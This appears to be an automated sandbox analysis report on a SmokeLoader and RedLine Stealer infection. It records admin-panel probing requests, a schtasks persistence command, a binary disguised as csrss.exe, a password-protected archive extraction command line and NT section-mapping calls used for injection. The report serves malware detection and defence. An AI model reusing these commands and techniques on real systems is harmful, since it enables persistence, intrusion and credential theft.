2023-11-30 10:23:33 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:33 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:33 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
164	192.168.2.4	57520	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:33 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:33 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:33 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:33 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
165	192.168.2.4	57640	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:33 UTC	203	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
2023-11-30 10:23:33 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:33 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:33 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
166	192.168.2.4	50596	64.190.63.111	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:33 UTC	168	OUT	GET /phpmyadmin/ HTTP/1.1 Host: a5a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:33 UTC	122	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 33 39 20 73 74 61 74 75 73 20 63 6f 64 65 20 34 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 4e 67 69 6e 58 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 439 status code 439Content-Length: 0Date: Thu, 30 Nov 2023 10:23:33 GMTServer: NginXConnection: close

Target ID:	0
Start time:	11:18:57
Start date:	30/11/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	299'008 bytes
MD5 hash:	D05323747875E19243C7B15791BCAA1E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1805559161.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1805559161.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1805874215.0000000004831000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1805874215.0000000004831000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.1737285169.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1805728659.0000000002C61000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1805537161.0000000002AE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:19:06
Start date:	30/11/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	11:19:27
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Roaming\vahvrsu
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vahvrsu
Imagebase:	0x400000
File size:	299'008 bytes
MD5 hash:	D05323747875E19243C7B15791BCAA1E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2104229521.0000000002B30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2105509155.0000000004631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2105509155.0000000004631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2105121877.0000000002BA0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2104350043.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2104350043.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000003.2048461979.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 49%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:19:42
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Local\Temp\38B4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\38B4.exe
Imagebase:	0xee0000
File size:	16'709'120 bytes
MD5 hash:	D4E64AB0FF97F98EE52336A12F8A866B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:19:44
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Local\Temp\41CD.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\41CD.exe
Imagebase:	0x140000
File size:	411'424 bytes
MD5 hash:	1213B099D1578505C431AD2BE2137F96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 49%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:19:44
Start date:	30/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:19:44
Start date:	30/11/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0xe90000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2373403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:19:46
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Local\Temp\4A1B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4A1B.exe
Imagebase:	0x890000
File size:	2'618'520 bytes
MD5 hash:	FBCBD8CF00AE50409FBB729F3303A84C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 51%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:19:48
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Local\Temp\50E3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\50E3.exe
Imagebase:	0x400000
File size:	1'965'056 bytes
MD5 hash:	1457EF90EFDE49A7EE83080CE051D6F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.2285416255.000000000288F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:19:49
Start date:	30/11/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 /s C:\Users\user\AppData\Local\Temp\57C9.dll
Imagebase:	0x7ff718740000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:19:49
Start date:	30/11/2023
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	/s C:\Users\user\AppData\Local\Temp\57C9.dll
Imagebase:	0xc80000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:19:50
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\user\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\user\AppData\Local\Temp\"
Imagebase:	0x570000
File size:	739'840 bytes
MD5 hash:	43141E85E7C36E31B52B22AB94D5E574
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:19:51
Start date:	30/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:19:53
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Local\Temp\50E3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\50E3.exe
Imagebase:	0x400000
File size:	1'965'056 bytes
MD5 hash:	1457EF90EFDE49A7EE83080CE051D6F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	11:19:56
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Local\Temp\8042.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8042.exe
Imagebase:	0x400000
File size:	297'984 bytes
MD5 hash:	F7B08E0D5053C01E5792AB9B8DCB1F11
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.2424970399.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.2425830619.0000000004721000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.2425830619.0000000004721000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.2425309073.0000000002C70000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000003.2369465159.0000000004700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:19:57
Start date:	30/11/2023
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x710000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:19:58
Start date:	30/11/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:20:01
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Roaming\vahvrsu
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vahvrsu
Imagebase:	0x400000
File size:	299'008 bytes
MD5 hash:	D05323747875E19243C7B15791BCAA1E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000003.2439565285.0000000002C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:20:05
Start date:	30/11/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:20:05
Start date:	30/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:20:05
Start date:	30/11/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
Imagebase:	0x3e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:20:08
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
Imagebase:	0x7ff6a70b0000
File size:	8'750'592 bytes
MD5 hash:	D1580EB52E6B28ACFB6CF06AACD95C98
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 70%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:20:09
Start date:	30/11/2023
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	1'965'056 bytes
MD5 hash:	1457EF90EFDE49A7EE83080CE051D6F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.2450588768.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:20:12
Start date:	30/11/2023
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	1'965'056 bytes
MD5 hash:	1457EF90EFDE49A7EE83080CE051D6F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	11:20:17
Start date:	30/11/2023
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	1'965'056 bytes
MD5 hash:	1457EF90EFDE49A7EE83080CE051D6F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:20:21
Start date:	30/11/2023
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	1'965'056 bytes
MD5 hash:	1457EF90EFDE49A7EE83080CE051D6F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	11:20:29
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Roaming\tdhvrsu
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\tdhvrsu
Imagebase:	0x400000
File size:	297'984 bytes
MD5 hash:	F7B08E0D5053C01E5792AB9B8DCB1F11
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:21:01
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
Imagebase:	0x7ff6a70b0000
File size:	8'750'592 bytes
MD5 hash:	D1580EB52E6B28ACFB6CF06AACD95C98
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	11:22:02
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
Imagebase:	0x7ff6a70b0000
File size:	8'750'592 bytes
MD5 hash:	D1580EB52E6B28ACFB6CF06AACD95C98
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	11:23:00
Start date:	30/11/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe
Wow64 process (32bit):
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
Imagebase:
File size:	8'750'592 bytes
MD5 hash:	D1580EB52E6B28ACFB6CF06AACD95C98
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	40.8%
Total number of Nodes:	98
Total number of Limit Nodes:	4

Executed Functions

Function 00401590 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
